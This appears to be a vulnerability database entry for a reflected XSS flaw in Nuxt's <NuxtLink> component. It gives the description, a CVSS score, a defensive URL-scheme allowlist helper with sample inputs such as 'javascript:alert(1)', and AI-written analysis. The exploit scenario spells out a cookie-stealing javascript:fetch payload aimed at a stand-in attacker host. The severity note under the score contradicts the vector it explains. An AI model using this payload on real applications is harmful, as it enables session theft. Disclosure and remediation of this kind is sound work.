Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Network-delivered XSS with no privileges required; S:C because script executes in the application's browser origin; UI:R for required victim click.
Primary rating from Vendor (GitHub_M).
Description (CVE.org)
Nuxt is an open-source web development framework for Vue.js. Prior to versions 3.21.7 and 4.4.7, <NuxtLink> did not validate the URL scheme of values bound to its to or href props before rendering them into the href attribute of the underlying <a> element. When an application binds attacker-controlled input (a query parameter, a CMS field, a user-supplied profile URL) to <NuxtLink :to> or :href, the attacker can supply a javascript: or vbscript: URL that is reflected verbatim into the rendered markup. Clicking the link executes the supplied script in the origin of the Nuxt application, resulting in reflected DOM-based cross-site scripting. A data:text/html,... payload reflected through the same sink does not execute in the application's origin but enables a same-tab phishing surface anchored to a legitimate application link. The same value was exposed to consumers of the component's custom slot via the href and route.href props, so applications that re-bind those values to their own anchors were affected identically. This issue has been patched in versions 3.21.7 and 4.4.7.
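The scheme check the description says was missing can be applied in application code to any untrusted value before it is bound to `<NuxtLink :to>` or `:href`. The helper below is an added example, not code from Nuxt and not the implementation of its `sanitizeExternalHref()` fix; the names `safeHref`, `ALLOWED_SCHEMES` and `SENTINEL_BASE`, the allowlist contents and the placeholder origin are assumptions.

```javascript
// Hypothetical helper (not Nuxt's sanitizeExternalHref): allowlist the URL
// scheme of untrusted values before binding them to <NuxtLink :to> / :href.
// Assumed policy: only web and mail links may be rendered.
const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

// Placeholder origin used only to resolve relative inputs (assumption).
const SENTINEL_BASE = 'https://nuxt-app.invalid';

function safeHref(input, fallback = '/') {
  if (typeof input !== 'string') return fallback;
  let url;
  try {
    // The WHATWG URL parser normalises input the way a browser does:
    // it strips leading/trailing control characters and spaces, removes
    // embedded tabs and newlines, and lowercases the scheme. A string
    // comparison such as startsWith('javascript:') misses those forms.
    url = new URL(input, SENTINEL_BASE);
  } catch {
    return fallback; // unparseable input is never rendered
  }
  if (!ALLOWED_SCHEMES.has(url.protocol)) return fallback;
  // Relative input resolved against the sentinel: return an app-local path.
  if (url.origin === SENTINEL_BASE) {
    return url.pathname + url.search + url.hash;
  }
  return url.href; // absolute http(s)/mailto URL, normalised
}

// Constructed sample inputs covering the schemes named in the description.
const samples = [
  '/users/42?tab=posts',
  'https://example.com/a',
  'mailto:a@example.com',
  'javascript:alert(1)',
  ' JaVaScRiPt:alert(1)',
  'java\tscript:alert(1)',
  'vbscript:msgbox(1)',
  'data:text/html,<h1>x</h1>',
];
for (const s of samples) {
  console.log(JSON.stringify(s), '->', safeHref(s));
}
// Template usage: <NuxtLink :to="safeHref(user.profileUrl)">Profile</NuxtLink>
```

The helper only constrains the scheme: an `https:` link to an arbitrary external host still passes, so redirect policy needs its own check.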
Analysis (AI)
Reflected DOM-based XSS in Nuxt's built-in <NuxtLink> component allows an unauthenticated attacker to inject script-capable URLs (javascript:, vbscript:) that execute in the application's origin when a victim clicks a crafted link, affecting all Nuxt v3 versions prior to 3.21.7 and v4 versions prior to 4.4.7. Exploitation is contingent on application code that binds attacker-controlled input - such as query parameters, CMS link fields, or user-supplied profile URLs - directly to the component's to or href props without prior sanitization. …
Vulnerability Assessment (AI)
| Exploitation | Exploitation requires that the target Nuxt application explicitly passes attacker-controlled input - originating from a query parameter, a user-supplied profile URL, a CMS-managed link field, or any other external data source - directly to the to or href prop of a <NuxtLink> component without prior scheme validation. … |
| Risk Assessment | The CVSS 4.0 score of 5.1 (Medium, AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N) accurately characterizes the exploitability profile: the attack is network-reachable with no complexity or privilege requirements, but requires a victim to click the crafted link (UI:A), which meaningfully constrains mass exploitation. … |
| Exploit Scenario | An attacker identifies a Nuxt application that renders user-supplied profile URLs through <NuxtLink :to='user.profileUrl'> and submits javascript:fetch('https://attacker.example/c?d='+document.cookie) as their profile URL value stored in the application's CMS or user record. When an authenticated victim (such as an administrator reviewing user profiles) visits the page and clicks the rendered profile link, the script executes in the application's origin, exfiltrating the victim's session cookies or CSRF tokens to the attacker's server. … |
| Remediation | The primary remediation is to upgrade to Nuxt 3.21.7 (v3 branch) or 4.4.7 (v4 branch), both of which include the sanitizeExternalHref() fix confirmed by patch commits at https://github.com/nuxt/nuxt/commit/0103ce06fbbbdfa079a7f020ef8ce00121eac4a3 and https://github.com/nuxt/nuxt/commit/53284043dc21210a25d629d1cec67d3ae557ffd0. … |
EUVD-2026-36428
GHSA-934w-87qh-qr26